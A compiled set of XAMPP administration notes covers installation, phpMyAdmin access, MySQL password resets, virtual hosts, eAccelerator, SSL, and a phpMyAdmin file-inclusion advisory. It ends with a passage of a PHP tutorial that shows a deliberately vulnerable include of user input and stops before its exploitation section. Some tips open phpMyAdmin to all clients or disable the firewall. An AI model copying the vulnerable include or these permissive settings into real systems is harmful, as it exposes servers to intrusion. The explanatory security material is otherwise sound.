xampp docs
xampp download
http://nchc.dl.sourceforge.net/project/xampp/XAMPP%20Linux/1.8.1/xampp-linux-1.8.1.tar.gz
http://downloads.sourceforge.net/project/xampp/XAMPP%20Linux/5.6.3/xampp-linux-x64-5.6.3-0-installer.run
xampp security
phpMyAdmin security configuration in XAMPP
http://blog.csdn.net/nailwl/article/details/7342778
How to handle "Access forbidden" in phpMyAdmin
http://blog.csdn.net/xshalk/article/details/8537551
Local environment: fixing phpMyAdmin being inaccessible after installing XAMPP on Ubuntu
http://www.douban.com/note/233575808/
Ubuntu: at the time of writing, the latest Ubuntu release is 12.04. The fault described here also occurred in that environment.
XAMPP: xampp-linux-1.8.0.tar.gz
The installation process is not covered in detail. This goes straight to the message shown when visiting http://localhost/phpmyadmin/ after installation:
Access forbidden!
New XAMPP security concept:
Access to the requested directory is only available from the local network.
This setting can be configured in the file “httpd-xampp.conf”.
Solution:
Switch to the command line and first change to the root account
$ sudo -s
Open the httpd-xampp.conf file to be edited with vi
# vi /opt/lampp/etc/extra/httpd-xampp.conf
(See the relevant documentation for how to use vi.)
Find this block:
# since XAMPP 1.4.3
<Directory "/opt/lampp/phpmyadmin">
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
</Directory>
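Add the line Require all granted to it, so that it ends up as shown below. Note that Require all granted admits every client that can reach the server, not only the local network named in the error message.
# since XAMPP 1.4.3
<Directory "/opt/lampp/phpmyadmin">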
AllowOverride AuthConfig Limit
Order allow,deny
Allow from all
Require all granted
</Directory>
Save and exit. Restart XAMPP.
Done.
Original link: http://aiwei.us/5325.html
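Starting XAMPP automatically at boot
5. Configure XAMPP to start with the system. XAMPP does not start automatically after a reboot, so this has to be set up: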
ln -s /opt/lampp/lampp /etc/rc.d/rc3.d/S99lampp
ln -s /opt/lampp/lampp /etc/rc.d/rc4.d/S99lampp
ln -s /opt/lampp/lampp /etc/rc.d/rc5.d/S99lampp
Configuring multiple websites in XAMPP / Apache multi-site configuration
How to set up N sites under Apache
http://www.woplus.com/phptech/apache-website-peizhi/
Suppose your host's IP is 127.0.0.1 and the host has three domain names:
www.a.com, with web files in E:\web\www\1
www.b.com, with web files in E:\web\www\2
www.c.com, with web files in E:\web\www\3
Add the following to Apache's httpd.conf:
# Map different domain names to different directories
NameVirtualHost 127.0.0.1
<VirtualHost 127.0.0.1>
DocumentRoot "E:\web\www\a"
ServerName www.a.com
</VirtualHost>
<VirtualHost 127.0.0.1>
DocumentRoot "E:\web\www\b"
ServerName www.b.com
</VirtualHost>
<VirtualHost 127.0.0.1>
DocumentRoot "E:\web\www\c"
ServerName www.c.com
</VirtualHost>
After configuring, restart Apache and you're done!
Configuring multiple websites in XAMPP
XAMPP Security: phpMyAdmin file inclusion vulnerability
PHP file inclusion vulnerabilities: how they work and how they are exploited
http://www.dedecms.com/knowledge/program/php/2009/0929/48.html
http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php
Why Apache2 shows 403 Forbidden after installation / apache index list allow / having Apache list all files
http://www.toplee.com/blog/93.html
Change 1
<Directory />
Options FollowSymLinks
AllowOverride None
#XAMPP
#Order deny,allow
#Deny from all
# tangxje add
Order allow,deny
Allow from all
</Directory>
Change 2
## <Directory "/opt/lampp/htdocs">
<Directory "/b2clog">
Change 3
## DocumentRoot "/opt/lampp/htdocs"
DocumentRoot "/b2clog"
[root@lindows lampp]# ./lampp security
XAMPP: Quick security check...
XAMPP: Your XAMPP pages are NOT secured by a password.
XAMPP: Do you want to set a password? [yes] yes
XAMPP: Password:
XAMPP: Password (again):
XAMPP: Password protection active. Please use 'lampp' as user name!
XAMPP: MySQL is accessable via network.
XAMPP: Normaly that's not recommended. Do you want me to turn it off? [yes] yes
XAMPP: Turned off.
XAMPP: MySQL has to run before I can check the security.
XAMPP: MySQL has to run before I can check the security.
XAMPP: The FTP password is still set to 'lampp'.
XAMPP: Do you want to change the password? [yes] yes
XAMPP: Password:
XAMPP: Password (again):
XAMPP: ProFTPD isn't running...
XAMPP: Done.
[root@lindows lampp]# ./lampp restart
Stopping XAMPP for Linux 1.6.7...
XAMPP: XAMPP-Apache is not running.
XAMPP: XAMPP-MySQL is not running.
XAMPP: XAMPP-ProFTPD is not running.
XAMPP stopped.
Starting XAMPP for Linux 1.6.7...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Error 1! Couldn't start Apache!
XAMPP: Starting diagnose...
XAMPP: Your /etc/hosts is not okay. I will fix it.
XAMPP: See also http://www.apachefriends.org/faq-lampp-en.html#failed
XAMPP: Next try...
XAMPP: Starting Apache with SSL (and PHP5)...
XAMPP: Starting MySQL...
XAMPP: Starting ProFTPD...
XAMPP for Linux started.
http://localhost
id: lampp password: ********
Install XAMPP for easy, integrated development
http://www.ibm.com/developerworks/linux/library/l-xampp/
XAMPP download
http://www.apachefriends.org/en/xampp.html
http://sourceforge.net/projects/xampp/files/XAMPP%20Linux/
http://ncu.dl.sourceforge.net/project/xampp/XAMPP%20Windows/1.7.3/xampp-win32-1.7.3.zip
http://sourceforge.net/projects/xampp/files/XAMPP%20Windows/xampp-win32-1.7.3.zip/download
XAMPP windows
http://luoke920.iteye.com/blog/719873
Installing eAccelerator on Windows
http://hi.baidu.com/btjxzzy/blog/item/f09f4cd9e9c1ba2e11df9b00.html
XAMPP for Windows: a quick tutorial
http://www.iteye.com/topic/569983
How to debug PHP in an XAMPP + Eclipse environment
XAMPP svn plugin
For Apache SVN, the following needs to be added to httpd.conf:
#added by ggsonic
LoadModule dav_svn_module modules/mod_dav_svn.so
LoadModule authz_svn_module modules/mod_authz_svn.so
#added by ggsonic for svn url
<Location /svn/project1>
DAV svn
SVNPath D:/develop/repo/svn/project1
</Location>
Right-click the D:/develop/repo/svn/project1 folder and create the repository.
In php.ini, extension=php_curl.dll needs to be enabled.
XAMPP eAccelerator enable
http://leeyin.iteye.com/blog/436259
PHP cache accelerator: eAccelerator
http://www.linuxsir.org/main/node/257
Introduction to the PHP accelerator eAccelerator
http://www.toplee.com/blog/100.html
Speeding up PHP: eAccelerator configuration and usage guide
http://www.chedong.com/blog/archives/001154.html
[EAC] PHP precompilation acceleration: eAccelerator installation and performance comparison
http://lin71896532.blog.35.cn/2008/08/21/xampp%E4%B8%AD%E6%BF%80%E6%B3%95eaccelerator/
First, look at the list of PHP-related components that come preinstalled with XAMPP:
Apache 2.2.9,
MySQL 5.0.51b,
PHP 5.2.6 & 4.4.8 & PEAR + SQLite 2.8.17/3.3.17 + multibyte (mbstring) support,
Perl 5.10.0,
ProFTPD 1.3.1,
phpMyAdmin 2.11.7,
OpenSSL 0.9.8h,
GD 2.0.1,
Freetype2 2.1.7,
libjpeg 6b,
libpng 1.2.12,
gdbm 1.8.0,
zlib 1.2.3,
expat 1.2,
Sablotron 1.0,
libxml 2.6.31,
Ming 0.3,
Webalizer 2.01,
pdf class 009e,
ncurses 5.8,
mod_perl 2.0.4,
FreeTDS 0.63,
gettext 0.11.5,
IMAP C-Client 2004e,
OpenLDAP (client) 2.3.11,
mcrypt 2.5.7,
mhash 0.8.18,
eAccelerator 0.9.5.3 ,
cURL 7.18.2,
libxslt 1.1.8,
phpSQLiteAdmin 0.2,
libapreq 2.08,
FPDF 1.53,
XAMPP Control Panel 0.6
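So we only need to reconfigure the options in php.ini
... (omitted) ...
Remove the semicolon at the start of each line and restart XAMPP. eAccelerator is then active.
For details, see: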
http://www.apachefriends.org/en/xampp.html
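Also attached: tutorials (IBM) on installing PHP optimization extensions under XAMPP
Make PHP apps fast, faster, fastest!
Caching data in memory with the Memcache daemon
XAMPP - Baidu Baike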
http://baike.baidu.com/view/864591.htm
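Software information
Many people know from their own experience that installing an Apache server is not easy, and it gets harder if you want to add MySQL, PHP and Perl. XAMPP is an easy-to-install Apache distribution that contains MySQL, PHP and Perl. XAMPP really is very easy to install and use: just download, extract and start.
Software versions
So far XAMPP exists in the following four versions: a version for Linux (tested on Ubuntu, SuSE, RedHat, Mandrake and Debian); a version for Windows 98, NT, 2000, 2003, XP and Vista; a beta version for Solaris SPARC (developed and tested under Solaris 8); and a beta version for Mac OS X. The XAMPP versions for Mac OS X and Solaris are still in the first stage of development. Use at your own risk! XAMPP 1.7.2 has been released! Updates: Apache 2.2.6 + OpenSSL 0.9.8g, MySQL 5.0.51, PHP 5.2.5 & PHP 4.4.6, phpMyAdmin 2.11.3, FileZilla FTP Server 0.9.24, Mercury Mail Transport System v4.52
Notes
MOD_PERL warning: the newly released Apache 2.2.6 does not support mod_perl (win32). The Apache httpd team appears to be aware of the problem and will fix it in the next Apache release. By the way, Mod_JK (the Tomcat 6.0.13 plug-in) works without problems. Note for Vista users: because of insufficient write permissions on the c:\program files folder of a default Vista installation, we recommend creating a new path for the XAMPP installation, such as c:\xampp or c:\myfolder\xampp.
Installation and running
Installing and starting
Log in as a system administrator and extract the downloaded package to any directory on the server (not inside a directory with a Chinese name), for example the root of drive C. Double-click setup_xampp.bat in that directory to initialize XAMPP. Then run xampp-control.exe to start or stop Apache, MySQL and the other modules, and to register them as services.
Switching between PHP 5 and PHP 4: since version 1.4.7 XAMPP supports starting with either PHP 5 or PHP 4, so users can choose according to what their PHP programs need. Run php-switch.bat in the root directory to open the PHP switch command window. To switch to php4, enter 4 in the command window. To switch to php5, enter 5 in the command window.
Moving the whole environment elsewhere (to another directory or server): just run setup_xampp.bat in the root directory to open the command window and choose "1" to re-initialize the environment. Note: if you have enabled virtual hosts, you then need to re-check that the relative paths in the virtual host configuration file are correct (no check is needed if absolute paths are set).
Improving system security
A default XAMPP installation is very insecure: ordinary users can reach its web administration pages and modify the database without any password. Just click the "Security" option in the left-hand menu and follow the wizard to complete the security setup. By default phpMyAdmin has two user names, pma and root. root is the administrator and pma is an ordinary user, but by default neither has a password. Passwords for these two default users must be set, as follows:
(1) First set the root account's password under "Security".
(2) Enter phpMyAdmin through the phpMyAdmin entry in the navigation bar on the left of the default home page, enter the user name root and simply click log in.
(3) Change the pma account password: after logging in, click the "Privileges" menu on the home page, click the icon after the user name "pma" on the "User overview" page to open the privilege settings page, and set the password under "Change password" on the "Edit privileges" page. After the change, use a text editor such as WordPad or Notepad to change the pma password on line 63 of xampp\phpMyAdmin\config.inc.php to the password you just set; otherwise login will fail.
Note: the MySQL database status on the XAMPP web main page shows ACTIVATED only when pma has no password!
Directory layout:
Web programs (PHP, HTML) all go in xampp\htdocs\
Perl file directory: xampp\cgi-bin\
Apache base configuration: xampp\apache\conf\extra\httpd.conf
Further Apache configuration files (virtual hosts and so on): xampp\apache\conf\extra\
PHP configuration file: xampp\apache\bin\php.ini
Configuring virtual hosts:
Only the virtual host configuration file needs to be modified: xampp\apache\conf\extra\httpd-vhosts.conf. Only name-based virtual hosts (the server has a single IP) are described here. For IP-based ones (a server with multiple IPs, where each virtual host can have its own IP) and other methods, refer to the official Apache manual.
(1) Remove the "#" from "#NameVirtualHost *:80", i.e. change it to "NameVirtualHost *:80". If a port other than 80 is used, change "80" here and in the virtual host configuration below to the actual port.
(2) Look at the "VirtualHost example:" part further down in this configuration file. To make local operation easier, first create the "localhost" virtual host; otherwise, once virtual hosts are enabled, the local XAMPP web administration interface can no longer be reached. The configuration file comes with two examples that are configured but not enabled. The finished "localhost" virtual host should look like this:
<VirtualHost *:80>
## ServerAdmin
DocumentRoot /xampp/htdocs
ServerName localhost
## ErrorLog @rel_logfiledir@/dummy-host2.error_log
## CustomLog @rel_logfiledir@/dummy-host2.access_log common
</VirtualHost>
The items without comment markers are required and the commented items are optional. You can of course set more items according to the official Apache documentation.
"DocumentRoot": required. This is the root directory of the virtual host site. It can be a relative or an absolute path, and the path must not contain spaces or other special characters. A relative path is relative to the partition the environment is on. My environment is in the root of drive D, so the example writes "/xampp/htdocs"; it can also be written "D:/xampp/htdocs" (without a trailing "/"). If the environment is in the www directory on drive D, the path must be written "/www/xampp/htdocs", or alternatively "D:/www/xampp/htdocs" (without a trailing "/"). Most failed virtual host configurations are caused by a wrong path.
"ServerName": required. This is the domain name of the virtual host. It can be "localhost", "cmsware", and so on.
Common virtual host configuration problems: if Apache cannot be started through the control panel after configuration, run apache_start.bat and apache_stop.bat in the environment's root directory directly to start or stop Apache; the specific error message is then visible. If the virtual host configuration does not take effect, the Apache error log (xampp\apache\logs\error.log) usually shows the reason.
Reminders:
1. Skype conflicts with XAMPP's Apache, because by default Skype uses ports 80 and 443 as alternative ports for incoming connections, the so-called firewall traversal. Solution: in Skype's menu "Tools" -> "Options" -> "Connection", clear the checkbox in front of "Use port 80 and 443 as alternatives for incoming connections". Side effect: if your Skype is behind a firewall or proxy, it will not work properly unless port redirection on the firewall or proxy is set up correctly.
2. Running Xunlei (Thunder) also prevents the Apache in the XAMPP suite from starting. Stop Xunlei first; using it again after Apache has started is no problem.
3. When starting or stopping Apache or MySQL through the control panel, run apache_start.bat, apache_stop.bat or mysql_start.bat, mysql_stop.bat in the environment's root directory directly instead; the specific error message is then visible.
4. If you have enabled the FTP component but remote connections fail without any error message, check whether a firewall is configured on your server.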
XAMPP for Windows FAQ
Author: Kay Vogelgesang,
Version: 31 October 2005
The Simplified Chinese version of the FAQ is yet to be translated :)
1. General Questions
XAMPP does not work under Windows XP SP2!
Sure! But here, Microsoft delivered a new firewall. This firewall blocks the important ports 80 (http) and 443 (https) and the server does not want to start (anymore). The fast solution: Deactivate the Microsoft firewall with the toolbar and try to start XAMPP once more.
Of course, you can also define your own firewall exceptions in the Security Center. The following ports are needed for basic functionality:
http 80 (HTTP)
https 443 (SSL)
mysql 3306
And for all other servers in XAMPP:
ftp 21
smtp 25
pop3 110
imap 143
AJP/1.3 8009
http-alt 8080 (Tomcat Default Port)
Where do I change the start page?
The document root is the folder $path-to-xampp\xampp\htdocs. The index page there (index.html) is the actual start page, shown when you open http://localhost. Alternatively, this page can be deleted and replaced by "index.php" or "index.cgi" (etc.). The order of precedence of index pages in XAMPP is:
DirectoryIndex index.php index.php4 index.php3 index.cgi index.html index.htm index.html.var index.phtml
Note: After changing that, you will find the XAMPP examples with the URL http://localhost/xampp.
However, I need mod_perl, the Tomcat or Python!
The tools for this exist as XAMPP AddOns. Note: These additional packages work only with the XAMPP main package, not with "xampplite". At the moment there are the following AddOns:
Perl with mod_perl and many DBI drivers for the respective version of XAMPP (Apache)
Tomcat with mod_jk 2 but without Java JSDK. The JSDK required for that AddOn is published on the download page or in the Readme. You should install the Java JSDK before installing this AddOn!
Python with mod_python
You find all current AddOns for win32 on the XAMPP win32 download page. Besides that there are even further AddOns for XAMPP on
http:///projects/xamppaddon.
How do I check the md5 checksum?
To check whether the package really is from the developer, you need additional programs, for example the console program md5sum.exe:
http://downloads./contrib/md5sum/Windows/md5sum.exe
How it works:
Put the XAMPP package (e.g. xampp-win32-1.4.16.exe), the MD5 file (e.g. xampp-win32-1.4.16.5) and md5sum.exe in the same directory
Run the following command in cmd:
md5sum -c xampp-win32-1.4.16.
xampp-win32-1.4.16.exe OK
Otherwise something is wrong. By the way, another GUI program is MD5summer. Please visit their homepage for more information.: http://www.
There are three "php.ini". Which is now the correct one?
The \xampp\apache\bin\php.ini is the correct one! The others in the \xampp\php directory are only for PHP in CGI/CLI mode. So configure the \xampp\apache\bin\php.ini for web changes.
Modifications in the php.ini are also kept after the "PHP switch" (changing the PHP version). And note: modifications in the php.ini and in the httpd.conf always need an Apache restart!
Help! The PV.EXE (KILL.EXE) is a Virus in the XAMPP!
No! The "pv.exe" (formerly "kill.exe") is not a virus or a trojan. It is a normal utility for killing processes, like the kill command on Linux. We need it to stop some servers such as Apache, because the "shutdown/stop" statement does not work here without a service installation. But sometimes we start a server by hand and want to stop Apache cleanly.
Problem: Some virus scanners (such as Norton) raise warnings here, either because of the name ("kill") or perhaps because some virus/trojan bundles contain a kill program for stopping unwanted programs.
See also:
Microsoft C 1
Microsoft C 2
Not enough memory in the system environment
This kind of error message occurs only on home systems such as Windows 95/98/ME and XP Home. Problem: The poorer memory management of the Windows home systems does not allow some applications like the "" to work with more memory than 160 kb. But our servers need more. Solution: Add the following line to c:\config.sys:
shell=c:\windows\ c:\windows /e:2048 /p
After the restart of your complete system please try XAMPP again. The memory of 2048 kb can be used now. That should be sufficient.
The apache does not start on my system!!!
This problem can have several causes.
(1) You have started more than one HTTP server (IIS, Sambar, ZEUS and so on). Only one server can occupy port 80, so you must terminate the other HTTP server before you start Apache. Error messages like these indicate the problem:
"(OS 10048)... make_sock: could not bind to adress 0.0.0.0:85
no listening sockets available, shutting down"
"(OS 10038)Socket operation on non-socket: make_sock: for address 0.0.0.0:443, apr_socket_opt_set: (SO_KEEPALIVE)
no listening sockets available, shutting down"
(2) You have Windows 95 with an outdated Winsock, or your Winsock is damaged. Apache needs at least Winsock 2. Please download the current Winsock from www.
(3) Sometimes the Winsock2 information has been corrupted by poorly written Internet programs (worms, virus). A Winsock2 Fix written by Tom Kynch can solve this problem (only 95,98,ME).
(4) A firewall is running that blocks the Apache port. In this case, some pictures or JavaScript files cannot load via http://. Sometimes you must uninstall your firewall completely to fix this problem.
(5) You have XP professional without Service Pack 1. In this case the installation of SP1 is recommended urgently.
(6) You have a virus scanner from McAfee. Sometimes it causes problems. Deactivate McAfee while testing XAMPP.
(7) You have other software, such as the Internet Telephone "SKYPE" which also blocks the port 80. (thanks Peter! ) However, one can change the SKYPE port: Actions -- > Options --> Connection. Here remove the check mark at "Port 80" for an alternate port. Restart Skype and also it should work. (thank Monty! )
Tip: The "xampp-portcheck.exe" displays the status of every essential port of XAMPP. The status "Free" means the port is free, and that is okay.
My CPU load with Apache is almost 99%
Please enable the following line => # Win32DisableAcceptEx in /xampp/Apache/conf/httpd.conf.
In this case the correct form is: Win32DisableAcceptEx
Newer Apache versions have improved Winsock 2 support, but it does not work correctly with the Windows home versions. The "Win32DisableAcceptEx" statement in httpd.conf deactivates this support. Sometimes some Windows NT systems cause trouble too. We do not know why.
Pictures and style Sheets are not displayed!
Some applications (phpEclipse, phpBB etc.) have problems displaying large files or pictures. This problem can be solved with these lines in /xampp/Apache/conf/httpd.conf:
# EnableSendfile off
# EnableMMAP off
Please activate these lines by removing the #:
EnableSendfile off
EnableMMAP off
Apache restart.
Conversely, sometimes, from
EnableSendfile off
EnableMMAP off
you should make
# EnableSendfile off
# EnableMMAP off
Try it out! Thanks for this solution to the forum and Kris!
This problem is often caused by the program "NetLimiter" for regulating bandwidth. Please see here the thread in our forum
http://www./f/viewtopic.php?t=6195&highlight=netlimiter
for more information.
I would like to install the MySQL server as a service!
This only works under NT, Windows 2000 and Windows XP.
(1) Service installation: Under /xampp/mysql double-click on the "mysql_installservice.bat".
(2) Service uninstallation: Under /xampp/mysql double-click on the "mysql_uninstallservice.bat". That is all!
How can I set a "root" password in MySQL? (method 1)
In the \xampp\mysql\bin directory enter into the console:
mysqladmin -u root password secret
OK, "secret" should be your secret password. Then update the password for PHPMyAdmin. Open "config.inc.php" in \xampp\phpmyadmin and edit the following lines:
INSTEAD OF ...
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
NOW ...
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'secret';
Set a new 'root' password with mysqladmin
How can I set a "root" password in MySQL? (method 2)
Well, there is still another possibility to set the root password. Start PHPMyAdmin with http://127.0.0.1/phpmyadmin, open the database "mysql" (never delete this!) and use the table "user". Create here a new user or e.g. simply change the password of "root." MySQL restart! After that, do not forget to change the password in the "xampp/phpmyadmin/config.inc.php" for PHPMyAdmin.
How can I set a "root" password in MySQL? (method 3)
This method is based on a suggestion by Ruedi from Basel. With that: Thanks and Grüssli to Switzerland!
Tip: Resetting the password can also be done with /xampp/mysql/resetroot.bat. After that, the password is empty, that is "".
Step 1: Run cmd
C:\program files\apachefriends\xampp\mysql\bin>mysqld-nt --skip-grant-tables
Step 2: Run cmd
C:\>"C:\program files\apachefriends\xampp\mysql\bin\mysqladmin" -u root flush-privileges password "newpwd"
Step 3: Stopping MySQL
C:\>"C:\program files\apachefriends\xampp\mysql\bin\mysqladmin" -u root -p shutdown
Enter password: ****** (newpwd)
Step 4: Edit the "config.inc.php" for the access of PHPMyAdmin
C:\program files\apachefriends\xampp\phpmyadmin\config.inc.php
Here search for "root"
$cfg['Servers'][$i]['password'] = 'newpwd'; // MySQL password
Step 5: MySQL restart
Can I use my own mysql server?
Why not! Simply don't start the mysql from the xampp package. So you can use your own MYSQL server. Please note! Two servers cannot be started on one same port! If you have set a password for root, please do not forget to edit the "config.inc.php" in \xampp\phpmyadmin for PHPMyAdmin.
Everyone can use PHPMyAdmin from outside!
In the basic configuration of XAMPP, PHPMyAdmin is publicly accessible. You can close this 'gap' with the "config.inc.php". Open the configuration file of PHPMyAdmin and edit the 'auth_type' lines:
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'secret';
Now correctly ...
$cfg['Servers'][$i]['auth_type'] = 'http';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
Now user and password are checked before PHPMyAdmin accesses the MySQL server. Optionally you can set 'cookie' instead of 'http'.
PHPMyAdmin Login, here cookie based
Where is the IMAP support for PHP?
By default, IMAP support for PHP is deactivated in XAMPP because there were some mysterious initialization errors on some home versions such as Windows 98. Those who work with NT systems should open \xampp\apache\bin\php.ini and activate the PHP extension there by removing the leading semicolon:
extension=php_imap.dll
Apache restart! This is the way to load any PHP module that is not loaded in XAMPP.
I have problems with the reference of some classes in objects
Thank you, Jörg, for pointing out that problem! It seems the activation of the "Zend Optimizer" causes trouble here. Please open the \xampp\apache\bin\php.ini and deactivate all lines in the [Zend] section. After that, restart Apache.
Note: In the newer XAMPP versions, the ZEND extension is deactivated by default.
Other free opensource programs (CMS and so on) do not function!
Linux and Windows are different. For example, the crypt() function is not supported on Windows. Simple programming can also behave strangely: for example, the term 'var=Text;' works in PHP for Linux, but for some older PHP for win32 you have to write 'var="Text";'. Or the interfaces are often too different. Or further necessary programs are missing on other platforms. This is why certain programs sometimes do not work with XAMPP.
Can I delete the "install" directory after "installation"?
No, better not. The scripts here are still needed for all additional packages (add-ons) and upgrades of XAMPP.
Where is the FrontPage extension?
We do not know of a free extension for Apache under win32. But there is a "Ready-to-Run FrontPage Server Extensions for Unix": http://www./fpsupport/.
But the developers in our forum often know more: http://www./f/
I would like to move the XAMPP package into another directory!
Hmm ... If the "install" directory is present I would try the following: Copy the entire XAMPP package into the new directory of your choice. Then run "setup_xampp.bat" there again to refresh all configuration files. Test everything! If all servers are really still working there, it is okay! If not, you should remove that copy!
How do I activate the eaccelerator?
Please open the "php.ini" in the directory \xampp\apache\bin\php.ini. Here activate the following lines by removing the semicolon in each line in the [eAccelerator] section:
extension=eaccelerator.dll
eaccelerator.shm_size = "0"
eaccelerator.cache_dir = "\xampp\tmp"
eaccelerator.enable = "1"
eaccelerator.optimizer = "1"
After that, don't forget to restart the Apache HTTPD!
I do not get any connection to my MS SQL server!
If the mssql extension was loaded in the php.ini, sometimes it comes to access problems when only TCP/IP is used. You can fix that problem with a newer "ntwdblib.dll" from Microsoft. Please replace the older file in the \xampp\apache\bin directory with your newer file from Microsoft. Apache restart. Thank you Horst for this topic note!
How do I work with the PHP mcrypt extension?
For this, we have opened a Topic in the forum with examples and also with some problem solutions: http://www.f/viewtopic.php?t=3012
Do Microsoft Active Server Pages (ASP) work with XAMPP?
No! And Perl:ASP in the Perl Add-on is not the same! Unfortunately no free implementation for the Apache is available.
I would like to use Perl with MOD_PERL!
For this you need our XAMPP Perl Add-on with the big Perl package plus mod_perl. Please refer to our Add-on download section
http://www./en/xampp-windows.html#644
and our Add-on practice section
http://www./en/xampp-windows.html#1176
for more information.
Similar PHP website development environments
XAMPP is very powerful. Beginners can also look at PHPnow, which makes learning easier.
http://www.apachefriends.org/en/faq-xampp-linux.html
How do I activate eAccelerator?
(since XAMPP for Linux 1.4.12)
To activate eAccelerator simply find the following lines in your /opt/lampp/etc/php.ini:
extension="eaccelerator.so"
eaccelerator.shm_size="16"
eaccelerator.cache_dir="/opt/lampp/tmp/eaccelerator"
eaccelerator.enable="1"
eaccelerator.optimizer="1"
eaccelerator.check_mtime="1"
eaccelerator.debug="0"
eaccelerator.filter=""
eaccelerator.shm_max="0"
eaccelerator.shm_ttl="0"
eaccelerator.shm_prune_period="0"
eaccelerator.shm_only="0"
eaccelerator.compress="1"
eaccelerator.compress_level="9"
Remove the semicolon at the beginning of each line and restart XAMPP. eAccelerator is now active. For more information about eAccelerator, check the eAccelerator home page: http://eaccelerator.net .
RHEL 5.5_x86-64 / firefox 3.0.18 / xampp1.7.4 /
Use https://127.0.0.1 or https://localhost to verify OpenSSL
https://127.0.0.1/xampp/splash.php
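Secure Connection Failed
127.0.0.1 uses an invalid security certificate.
The certificate is not trusted because it is self-signed.
The certificate is only valid for localhost.
The certificate expired on 30 September 2010 17:10.
(Error code: sec_error_expired_issuer_certificate)
* This could be a problem with the server's configuration, or it could be someone trying to impersonate the server.
* If you have connected to this server successfully in the past, the error may be temporary, and you can try again later.
Or you can add an exception …
You should not add an exception if you are using an internet connection that you do not trust completely or if you are not used to seeing a warning for this server.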
https://localhost/xampp/splash.php
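Secure Connection Failed
localhost uses an invalid security certificate.
The certificate is not trusted because it is self-signed.
The certificate expired on 30 September 2010 17:10.
(Error code: sec_error_expired_issuer_certificate)
* This could be a problem with the server's configuration, or it could be someone trying to impersonate the server.
* If you have connected to this server successfully in the past, the error may be temporary, and you can try again later.
Or you can add an exception …
You should not add an exception if you are using an internet connection that you do not trust completely or if you are not used to seeing a warning for this server.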
XAMPP WoSign SSL
Home >> Technical support >> SSL certificate installation guide
http://www.wosign.com/Support/ssl_installation.htm
[root@b2cbbs ~]# vim /opt/lampp/etc/httpd.conf
# Secure (SSL/TLS) connections
<IfModule ssl_module>
# XAMPP
<IfDefine SSL>
Include etc/extra/httpd-ssl.conf
</IfDefine>
</IfModule>
#
# Note: The following must must be present to support
# starting without SSL on platforms with no /dev/random equivalent
# but a statically compiled-in mod_ssl.
#
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
[root@b2cbbs extra]# vim /opt/lampp/etc/extra/httpd-ssl.conf
#SSLCertificateFile /opt/lampp/etc/ssl.crt/server.crt
SSLCertificateFile /opt/lampp/etc/ssl.crt/tanxiujin.com_public_crt.crt
SSLCertificateKeyFile /opt/lampp/etc/ssl.key/tangxiujin.com_private_key.key
#SSLCertificateKeyFile /opt/lampp/etc/ssl.key/server.key
#SSLCACertificatePath /opt/lampp/etc/ssl.crt
SSLCACertificateFile /opt/lampp/etc/ssl.crt/WoSignSGCServer_public_crt.crt
xampp memcache
http://pecl.php.net/package/memcache
xampp phpmyadmin PHP file inclusion vulnerabilities: how they work and how they are exploited
http://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php
PMASA-2011-11
Announcement-ID: PMASA-2011-11
Date: 2011-07-23
Summary
Local file inclusion vulnerability and code execution.
Description
In the 'relational schema' code a parameter was not sanitized before being used to concatenate a class name.
Severity
We consider this vulnerability to be critical.
Mitigation factor
An attacker must be logged in via phpMyAdmin to exploit this problem.
Affected Versions
Versions 3.4.0 to 3.4.3.1 are affected.
Solution
Upgrade to phpMyAdmin 3.4.3.2 or apply the related patch listed below.
References
This issue was found by Norman Hippert from The-Wildcat.de
Assigned CVE ids: CVE-2011-2718
Patches
Following commits have been made to fix this issue:
More information
For further information and in case of questions, please contact the phpMyAdmin team. Our website is phpmyadmin.net .
http://www.dedecms.com/knowledge/program/php/2009/0929/48.html
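I. The dangerous functions involved [include(), require(), include_once() and require_once()]
The include() and require() statements include and run the specified file.
The two constructs are identical except in how they handle failure. include() produces a warning, while require() results in a fatal error. In other words, use require() if you want processing of the page to stop when a file is missing. include() does not behave this way; the script continues to run.
If "allow_url_fopen" is enabled in PHP (the default configuration), the file to be included can also be specified with a URL (over HTTP or another supported wrapper) instead of a local file. If the target server interprets the target file as PHP code, variables can be passed to the included file using a URL query string of the kind used with HTTP GET.
For details see: http://www.phpe.net/manual/function.include.php
require_once() && include_once()
The require_once() and include_once() statements include and run the specified file during script execution. This behaviour is similar to the require() statement; the only difference is that if the code in the file has already been included, it is not included again. They are for cases where the same file might be included more than once during script execution and you want to make sure it is included only once, to avoid problems such as function redefinition and variable reassignment.
For details see: http://www.phpe.net/manual/function.require-once.php
II. Why include files
When writing programs, programmers do not like doing the same thing twice, nor writing the same code (some shared functions, for example) several times. So the shared code is put into a separate file, such as share.php, and then included from other files. In PHP the functions listed above are used for this purpose. The workflow is: to include share.php in main.php, I write include("share.php"), and the functions in share.php can then be used. A hard-coded file name like this is naturally no problem and causes no vulnerability. So where exactly does the problem come from?
Sometimes it may not be known in advance which file needs to be included. For example, look at the code of the following file, index.php: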
<?php
if ($_GET['page']) {
    include $_GET['page'];   // the request value is used directly as the include path
} else {
    include "home.php";
}
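A perfectly ordinary piece of PHP code. How does it work? This involves the meaning of $_GET, which I won't go into (otherwise I could write a whole article on HTTP). If you don't yet understand GET, POST and so on, you will need to search Google for some material and catch up.
The code above might be used like this: http://www.php100.com/php/index.php?page=main.php or http://www.php100.com/php/index.php?page=downloads.php. Combined with the code above, here is briefly how it works:
1. When the URL above is submitted, index.php obtains the value of page ($_GET[page]).
2. It checks whether $_GET[page] is empty. If it is not empty (here it is main.php), include is used to include that file.
3. If $_GET[page] is empty, the else branch runs and includes the file home.php.
III. Why the vulnerability arises
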